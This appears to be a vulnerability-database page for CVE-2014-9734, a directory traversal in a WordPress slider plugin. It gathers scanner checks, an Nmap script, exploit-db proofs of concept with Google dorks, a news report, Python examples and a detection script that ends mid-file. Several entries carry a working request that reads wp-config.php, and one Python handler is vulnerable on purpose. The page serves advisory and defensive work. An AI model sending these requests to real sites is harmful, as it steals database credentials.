ID CVE-2014-9734 Type cve Reporter cve@mitre.org Modified 2015-07-01T15:12:00
Description
Directory traversal vulnerability in the Slider Revolution (revslider) plugin before 4.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php.
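The traversal described above, as an added illustrative example written in Python for this page (it is not the Slider Revolution plugin's PHP source, which this page does not reproduce): a "show image" handler that appends the img parameter to its image directory, beside the containment check that closes the hole. The WordPress tree, the wp-config.php contents, the uploads path and the function names are constructed for the demonstration; the number of "../" segments needed depends on the directory the handler resolves against (the public PoC on this page uses a single one).

```python
"""
Added illustrative example: a Python model of a 'show image' handler in the
shape described by CVE-2014-9734, next to a hardened version. This is not
the Slider Revolution plugin's PHP code; the directory layout, file contents
and function names are constructed for the demonstration.
"""
import os
import tempfile

# Extensions the hardened handler is willing to serve (assumed allow-list).
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}


def make_fake_wordpress_root() -> str:
    """Create a throwaway tree that looks like a WordPress install:
    wp-config.php at the root and one slider image under wp-content/uploads.
    The file contents are constructed sample data."""
    root = tempfile.mkdtemp(prefix="wp-")
    uploads = os.path.join(root, "wp-content", "uploads", "revslider")
    os.makedirs(uploads)
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php\ndefine('DB_NAME', 'wp');\ndefine('DB_USER', 'wpuser');\n"
                "define('DB_PASSWORD', 's3cret');\n")
    with open(os.path.join(uploads, "slide1.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff\xe0JFIF-sample")
    return root


def image_dir(root: str) -> str:
    """Directory the handler is supposed to serve images from (assumed)."""
    return os.path.join(root, "wp-content", "uploads", "revslider")


def show_image_vulnerable(root: str, img: str) -> bytes:
    """Vulnerable shape: the img parameter is appended to the image directory
    with no normalisation, so '..' segments walk out of it and the handler
    returns whatever file they reach."""
    path = os.path.join(image_dir(root), img)   # '..' is honoured by the OS
    with open(path, "rb") as f:
        return f.read()


def show_image_hardened(root: str, img: str) -> bytes:
    """Hardened shape: resolve the requested path, require that it stays
    inside the image directory, and serve only image extensions."""
    base = os.path.realpath(image_dir(root))
    # os.path.join discards base when img is absolute, so an absolute img
    # also ends up outside base and is rejected by the containment test.
    candidate = os.path.realpath(os.path.join(base, img))
    # realpath collapses '..' and symlinks; compare against base + separator
    # so that a sibling such as '.../revslider2' does not pass as inside.
    if candidate != base and not candidate.startswith(base + os.sep):
        raise PermissionError("path escapes image directory: %r" % img)
    if os.path.splitext(candidate)[1].lower() not in IMAGE_EXTENSIONS:
        raise PermissionError("not an image file: %r" % img)
    with open(candidate, "rb") as f:
        return f.read()


def hardened_allows(root: str, img: str) -> bool:
    """True if the hardened handler serves img, False if it rejects it."""
    try:
        show_image_hardened(root, img)
        return True
    except PermissionError:
        return False


def demo() -> dict:
    """Run the traversal against both handlers and a legitimate request
    against the hardened one; return what each did."""
    root = make_fake_wordpress_root()
    # revslider -> uploads -> wp-content -> root: three '..' segments here.
    traversal = "../../../wp-config.php"
    leaked = show_image_vulnerable(root, traversal)
    legit = show_image_hardened(root, "slide1.jpg")
    return {
        "leaked_db_password": b"DB_PASSWORD" in leaked,
        "traversal_blocked": not hardened_allows(root, traversal),
        "legit_image_served": legit.startswith(b"\xff\xd8"),
    }


if __name__ == "__main__":
    print(demo())
```

The containment test compares resolved paths rather than rejecting the literal string "..", so encoded or mixed-separator variants that the web server or runtime decodes before the handler sees them are caught at the same point; the extension allow-list is a second, independent gate for the case where a symlink inside the image directory points elsewhere.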
{"openvas": [{"lastseen": "2020-05-12T17:23:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9734"], "description": "This host is installed with wordpress slider\n revolution plugin and is prone to arbitrary file download vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-07-10T00:00:00", "id": "OPENVAS:1361412562310805670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805670", "type": "openvas", "title": "WordPress Revslider Arbitrary File Download Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Revslider Arbitrary File Download Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805670\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2014-9734\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-10 15:54:40 +0530 (Fri, 10 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"WordPress Revslider Arbitrary File Download Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with wordpress slider\n revolution plugin and is prone to arbitrary file download vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to download an arbitrary file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper input\n sanitization of the img parameter in a revslider_show_image action to\n 'wp-admin/admin-ajax.php' script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to arbitrary files and to compromise\n the application.\");\n\n script_tag(name:\"affected\", value:\"WordPress Slider Revolution (revslider)\n plugin before 4.2.\");\n\n script_tag(name:\"solution\", value:\"Update to WordPress Slider Revolution 4.2 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"http://packetstormsecurity.com/files/132366/\");\n script_xref(name:\"URL\", value:\"http://marketblog.envato.com/news/plugin-vulnerability/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://revolution.themepunch.com/\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';\n\nif(http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"(DB_USER|DB_PASSWORD|DB_NAME)\"))\n{\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port, data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:24:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "description": "The host is installed with WordPress\n Slider Revolution plugin and is prone to arbitrary file download\n vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310805518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805518", "type": "openvas", "title": "WordPress Slider Revolution Arbitrary File Download Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Slider Revolution Arbitrary File Download Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805518\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 12:15:41 +0530 (Tue, 31 Mar 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_cve_id(\"CVE-2015-1579\", \"CVE-2014-9734\");\n script_name(\"WordPress Slider Revolution Arbitrary File Download Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with WordPress\n Slider Revolution plugin and is prone to arbitrary file download\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and\n check whether it is able to download an arbitrary file.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to missing validation of\n the img parameter in the revslider_show_image action, so '..' sequences\n allow reading arbitrary files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n unauthenticated 
remote attacker to download any arbitrary file.\");\n\n script_tag(name:\"affected\", value:\"WordPress Slider Revolution version\n 4.1.4 and prior.\");\n\n script_tag(name:\"solution\", value:\"Update to WordPress Slider Revolution 4.2 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/36554\");\n script_xref(name:\"URL\", value:\"http://www.homelab.it/index.php/2014/07/28/wordpress-slider-revolution-arbitrary-file-download\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nfunction construct_get_req(url, host, useragent)\n{\n wpReq = 'GET ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept-Encoding: gzip, deflate\\r\\n' +\n 'Connection: keep-alive\\r\\n\\r\\n';\n return wpReq;\n}\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + '/wp-admin/admin-ajax.php?action=revslider_show_image' +\n '&img=../wp-config.php';\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:http_port);\n\nwpReq = construct_get_req(url:url, host:host, useragent:useragent);\n\nwpRes = http_keepalive_send_recv(port:http_port, data:wpReq);\n\nif(wpRes && wpRes =~ \"^HTTP/1\\.[01] 301\")\n{\n url1 = egrep( pattern:\"Location: 
http://.*wp-config.php\", string:wpRes);\n hostname = split(url1, sep:\"/\", keep:FALSE);\n if(!hostname[2]){\n exit(0);\n }\n\n wpReq = construct_get_req(url:url, host:hostname[2], useragent:useragent);\n wpRes = http_keepalive_send_recv(port:http_port, data:wpReq);\n}\n\nif(wpRes && \"SECURE_AUTH_KEY\" >< wpRes && \"<?php\" >< wpRes &&\n \"DB_NAME\" >< wpRes && \"DB_USER\" >< wpRes && \"DB_PASSWORD\" >< wpRes)\n{\n report = http_report_vuln_url( port:http_port, url:url );\n security_message(port:http_port,data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-03T23:23:37", "description": "Multiple WordPress Themes (admin-ajax.php img param) - Arbitrary File Download. CVE-2015-1579. Webapps exploit for php platform", "published": "2014-09-01T00:00:00", "type": "exploitdb", "title": "Multiple WordPress Themes admin-ajax.php img param - Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "modified": "2014-09-01T00:00:00", "id": "EDB-ID:34511", "href": "https://www.exploit-db.com/exploits/34511/", "sourceData": "# WordPress CuckooTap Theme & eShop Arbitrary File Download\r\n# Risk: High\r\n# CWE number: CWE-200\r\n# Author: Hugo Santiago\r\n# Contact: hugo.s@linuxmail.org\r\n# Date: 31/08/2014\r\n# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405\r\n# Tested on: Windows 7 and Gnu/Linux\r\n# Google Dork: \"Index of\" +/wp-content/themes/cuckootap/\r\n\r\n# WordPress IncredibleWP Theme Arbitrary File Download\r\n# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/\r\n# Google Dork: \"Index of\" +/wp-content/themes/IncredibleWP/\r\n\r\n# WordPress Ultimatum Theme Arbitrary File Download\r\n# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s\r\n# Google Dork: \"Index of\" +/wp-content/themes/ultimatum\r\n\r\n# WordPress Medicate Theme Arbitrary File 
Download\r\n# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916\r\n# Google Dork: \"Index of\" +/wp-content/themes/medicate/\r\n\r\n# WordPress Centum Theme Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603\r\n# Google Dork: \"Index of\" +/wp-content/themes/Centum/\r\n\r\n# WordPress Avada Theme Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226\r\n# Google Dork: \"Index of\" +/wp-content/themes/Avada/\r\n\r\n# WordPress Striking Theme & E-Commerce Arbitrary File Download\r\n# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763\r\n# Google Dork: \"Index of\" +/wp-content/themes/striking_r/\r\n\r\n# WordPress Beach Apollo Arbitrary File Download\r\n# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/\r\n# Google Dork: \"Index of\" +/wp-content/themes/beach_apollo/\r\n\r\n\r\nPoC:\r\n\r\nhttp://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/34511/"}, {"lastseen": "2016-02-04T03:47:07", "description": "Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability. CVE-2014-9734,CVE-2015-1579. 
Webapps exploit for php platform", "published": "2015-03-30T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "modified": "2015-03-30T00:00:00", "id": "EDB-ID:36554", "href": "https://www.exploit-db.com/exploits/36554/", "sourceData": "# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability\r\n\r\n# Exploit Author : Claudio Viviani\r\n\r\n# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380\r\n\r\n# Software Link : Premium plugin\r\n\r\n# Dork Google: revslider.php \"index of\"\r\n \r\n\r\n# Date : 2014-07-24\r\n\r\n# Tested on : Windows 7 / Mozilla Firefox\r\n Linux / Mozilla Firefox\r\n\r\n\r\n######################\r\n\r\n# Description\r\n\r\nWordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability\r\n\r\n\r\n######################\r\n\r\n# PoC\r\n\r\nhttp://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php\r\n\r\n\r\n#####################\r\n\r\nDiscovered By : Claudio Viviani\r\n\r\n http://www.homelab.it\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\r\n#####################", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36554/"}], "packetstorm": [{"lastseen": "2017-04-11T03:24:16", "description": "", "published": "2017-04-07T00:00:00", "type": "packetstorm", "title": "WordPress Elegant Themes Divi Theme Directory Traversal Nmap NSE Script", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1579", "CVE-2014-9734"], "modified": "2017-04-07T00:00:00", "id": 
"PACKETSTORM:142064", "href": "https://packetstormsecurity.com/files/142064/WordPress-Elegant-Themes-Divi-Theme-Directory-Traversal-Nmap-NSE-Script.html", "sourceData": "`local http = require \"http\" \nlocal shortport = require \"shortport\" \nlocal stdnse = require \"stdnse\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \n \ndescription = [[ \nDirectory traversal vulnerability in the Elegant Themes Divi theme for WordPress \nallows remote attackers to read arbitrary files \nvia a .. (dot dot) in the img parameter \nin a revslider_show_image action to wp-admin/admin-ajax.php. \n \nNOTE: this vulnerability may be a duplicate of CVE-2014-9734. \n \nWordpress Slider Revolution Responsive <= 4.1.4 \nsuffers from Arbitrary File Download vulnerability. \n]] \n \n--- \n-- @usage \n-- nmap --script http-vuln-cve2015-1579 \n-- \n-- @args \n-- http-vuln-cve2015-1579.uri \n-- Wordpress root directory on the website. Default: '/' \n-- \n-- @output \n-- PORT STATE SERVICE \n-- 80/tcp open http \n-- | http-vuln-cve2015-1579 \n-- | VULNERABLE: \n-- | WordPress Plugin Slider REvolution 4.1.4 \n-- | Arbitrary File Download vulnerability \n-- | State: VULNERABLE (Exploitable for versions <= 4.1.4) \n-- | IDs: \n-- | CVE: CVE-2015-1579 \n-- | CVE: CVE-2014-9734 \n-- | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress \n-- | allows remote attackers to read arbitrary files \n-- | via a .. (dot dot) in the img parameter \n-- | in a revslider_show_image action to wp-admin/admin-ajax.php. \n-- | \n-- | NOTE: this vulnerability may be a duplicate of CVE-2014-9734. 
\n-- | \n-- | References: \n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579 \n-- \n--- \n \nauthor = \"Rewanth Cool\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"vuln\", \"intrusive\", \"exploit\"} \n \nportrule = shortport.port_or_service( {80, 443}, {\"http\", \"https\"}, \"tcp\", \"open\") \n \naction = function(host, port) \nlocal uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or \"/\" \n \nlocal vulnPath = \"wp-admin/admin-ajax.php\" \nlocal vulnParams = \"action=revslider_show_image&img=../wp-config.php\" \n \n-- Exploiting the vulnerability \nlocal response = http.get( host, port, uri..vulnPath..\"?\"..vulnParams ) \n \nif response.status == 200 then \nlocal vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal vuln = { \ntitle = \"WordPress Plugin Slider REvolution 4.1.4\", \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nDirectory traversal vulnerability in the Elegant Themes Divi theme for WordPress \nallows remote attackers to read arbitrary files \nvia a .. (dot dot) in the img parameter \nin a revslider_show_image action to wp-admin/admin-ajax.php. \n \nNOTE: this vulnerability may be a duplicate of CVE-2014-9734. 
\n]], \nIDS = { \nCVE = { \n\"CVE-2014-9734\", \n\"CVE-2015-1579\" \n}, \nreferences = { \n\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579\" \n}, \ndates = { \ndisclosure = { \nyear = \"2015\", \nmonth = \"02\", \nday = \"11\" \n}, \n} \n} \n} \n \n-- Matching the pattern in the response \nif( string.match(response.body, ((\"<?php\"):gsub(\"%p\",\"%%%0\"))) ) then \nvuln.state = vulns.STATE.EXPLOIT \nvuln.exploit_results = response.body \nreturn vulnReport:make_output(vuln) \nend \nend \nend \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142064/http-vuln-cve2015-1579.nse"}], "threatpost": [{"lastseen": "2020-09-11T21:53:12", "bulletinFamily": "info", "cvelist": ["CVE-2014-9734", "CVE-2015-5468", "CVE-2015-9406", "CVE-2019-9618"], "description": "Attackers were spotted targeting over one million WordPress websites in a campaign over the weekend. The campaign attempted to exploit old arbitrary-file-download vulnerabilities in WordPress plugins and themes (not the XSS flaws the same actor had targeted earlier), with the goal of harvesting database credentials.\n\nThe attacks were aiming to download [wp-config.php](<https://wordpress.org/support/article/editing-wp-config-php/>), a file critical to all WordPress installations. The file is located in the root of WordPress file directories and contains websites\u2019 database credentials and connection information, in addition to authentication unique keys and salts. 
By downloading the sites\u2019 configuration files, an attacker would gain access to the site\u2019s database, where site content and credentials are stored, said researchers with Wordfence who spotted the attack.\n\nBetween May 29 and May 31, researchers observed (and were able to block) over 130 million attacks targeting 1.3 million sites.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe peak of this attack campaign occurred on May 30, 2020,\u201d said Wordfence researchers [on Wednesday](<https://www.wordfence.com/blog/2020/06/large-scale-attack-campaign-targets-database-credentials/?utm_campaign=Wordfence%20Blog%20Emails&utm_medium=email&_hsmi=88917054&_hsenc=p2ANqtz-9VC4zU8rraluI1oOhXYuKduVFHJCD2zVc0DDeiYc4rMQ-9fPVyP5IHfIzCv1-wK9zBTWwZz4XtYdEXgCv7_OgjBcfPoLFrOmxoNYg9wuyeWYPhUBc&utm_content=88917054&utm_source=hs_email>). \u201cAt this point, attacks from this campaign accounted for 75 percent of all attempted exploits of plugin and theme vulnerabilities across the WordPress ecosystem.\u201d\n\nResearchers linked the threat actor in this incident to an attack earlier in May [previously targeting XSS](<https://www.wordfence.com/blog/2020/05/nearly-a-million-wp-sites-targeted-in-large-scale-attacks/>) vulnerabilities. 
These previous campaigns, which began on April 28, attempted to inject a malicious JavaScript into websites, that would then redirect visitors and take advantage of an administrator\u2019s session to insert a backdoor into the theme\u2019s header.\n\n\u201cAfter further investigation, we found that this threat actor was also attacking other vulnerabilities, primarily older vulnerabilities allowing them to change a site\u2019s home URL to the same domain used in the XSS payload in order to redirect visitors to malvertising sites,\u201d researchers said at the time.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/03155848/config-grab-attack-spike-2048x809-1.png>)\n\nThat campaign sent attacks from over 20,000 different IP addresses, said researchers. This most recent campaign is using the same IP addresses, which accounted for the majority of the attacks and sites targeted, leading researchers to link the two campaigns.\n\nThe more recent campaign has also expanded in its targeting, researchers said, now reaching nearly a million new sites that weren\u2019t included in the previous XSS campaign. As with the XSS campaigns, almost all of the attacks are targeted at older vulnerabilities in outdated plugins or themes that allow files to be downloaded or exported.\n\nWhile hundreds of exploits are being attempted, researchers told Threatpost that among the CVEs being most frequently used are [CVE-2014-9734](<https://nvd.nist.gov/vuln/detail/CVE-2014-9734>), [CVE-2015-9406](<https://nvd.nist.gov/vuln/detail/CVE-2015-9406>), [CVE-2015-5468](<https://nvd.nist.gov/vuln/detail/CVE-2015-5468>) and CVE-2019-9618. 
The attacker appears to be systematically scraping exploit-db.com and other sources for potential exploits \u2013 and then running them against a list of sites, researchers told Threatpost.\n\n\u201cMost of them are in themes or plugins designed to allow file downloads by reading the content of a file provided in a query string and then serving it up as a downloadable attachment,\u201d said Ram Gall, with Wordfence.\n\nResearchers said websites that may have been compromised must change their database password and authentication unique keys and salts immediately.\n\n\u201cIf your server is configured to allow remote database access, an attacker with your database credentials could easily add an administrative user, exfiltrate sensitive data, or delete your site altogether. Even if your site does not allow remote database access, an attacker who knows your site\u2019s authentication keys and salts may be able to use them to more easily bypass other security mechanisms.\u201d\n\nResearchers also urged users to ensure that their plugins are updated, as vulnerabilities in WordPress plugins and themes continue to be an issue. A few weeks ago, for instance, researchers disclosed two flaws in [Page Builder by SiteOrigin, a WordPress plugin](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) with a million active installs that\u2019s used to build websites via a drag-and-drop function. Both security bugs can lead to cross-site request forgery (CSRF) and XSS.\n\nIn this recent campaign, many of the flaws had patches available \u2013 but users had not updated, leaving their websites vulnerable: \u201cNonetheless, we urge you to make sure that all plugins and themes are kept up to date, and to share this information with any other site owners or administrators you know,\u201d said researchers. 
\u201cAttacks by this threat actor are evolving and we will continue to share additional information as it becomes available.\u201d\n", "modified": "2020-06-03T20:37:44", "published": "2020-06-03T20:37:44", "id": "THREATPOST:CD191CB2754EB09D32488CA26DCC19F8", "href": "https://threatpost.com/attackers-target-1m-wordpress-sites-to-harvest-database-credentials/156255/", "type": "threatpost", "title": "Attackers Target 1M+ WordPress Sites To Harvest Database Credentials", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
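An added detection example in Python, not code from Wordfence, Greenbone or the NSE script above, covering the two sides of the checks this page describes: classifying access-log request lines as CVE-2014-9734 exploitation attempts (including percent-encoded and double-encoded forms of "../"), and applying the response-side test the OpenVAS scripts use (PHP opening tag plus the DB_NAME/DB_USER/DB_PASSWORD defines) to decide whether a reply actually leaked wp-config.php. The log lines, client addresses and response bodies are constructed sample data, and the image-extension list is an assumption.

```python
"""
Added detection example, not code from Wordfence, Greenbone or the NSE script
above: find CVE-2014-9734 exploitation attempts in web-server access logs and
apply the response-side test the OpenVAS checks use to tell a real wp-config.php
leak from a harmless reply. All log lines, addresses and bodies below are
constructed sample data.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format: client IP, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions a slider image request is expected to end with (assumption).
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".webp")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Strip percent-encoding until it stops changing (bounded), so that
    '%2e%2e%2f' and the double-encoded '%252e%252e%252f' both yield '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_show_image(target: str):
    """Return the decoded img value when target is a revslider_show_image
    call to admin-ajax.php, otherwise None."""
    parts = urlsplit(target)
    if not decode_fully(parts.path).endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query)          # parse_qs removes one encoding layer
    if decode_fully(qs.get("action", [""])[0]) != "revslider_show_image":
        return None
    return decode_fully(qs.get("img", [""])[0])


def is_traversal(img: str) -> bool:
    """True when img leaves the plugin's image directory or names something
    other than an image: a '..' segment, an absolute path (POSIX or a Windows
    drive letter), or a non-image extension such as wp-config.php."""
    normalised = img.replace("\\", "/")
    if ".." in normalised.split("/"):
        return True
    if normalised.startswith("/") or re.match(r"^[A-Za-z]:", normalised):
        return True
    return not normalised.lower().endswith(IMAGE_EXTENSIONS)


def scan_log(lines):
    """Return (client IP, decoded img, HTTP status) for each exploitation
    attempt. A 200 with a body-sized response is the one to investigate."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        img = parse_show_image(m.group("target"))
        if img is not None and is_traversal(img):
            hits.append((m.group("ip"), img, int(m.group("status"))))
    return hits


def response_leaks_wp_config(body: str) -> bool:
    """Response-side test from the OpenVAS scripts on this page: the reply
    must look like PHP source and carry the database-credential defines.
    Matching '<?php' alone, as the NSE script does, also fires on any other
    PHP file the handler returns, so the defines are required as well."""
    return "<?php" in body and all(
        key in body for key in ("DB_NAME", "DB_USER", "DB_PASSWORD"))


# Constructed sample: a legitimate slider image, three traversal variants
# (plain, percent-encoded, double-encoded under a sub-path) and an unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/May/2020:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slide1.jpg HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/May/2020:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3210',
    '198.51.100.7 - - [30/May/2020:10:01:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 200 3210',
    '198.51.100.8 - - [30/May/2020:10:02:44 +0000] "GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%252fwp-config.php HTTP/1.1" 404 196',
    '192.0.2.9 - - [30/May/2020:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
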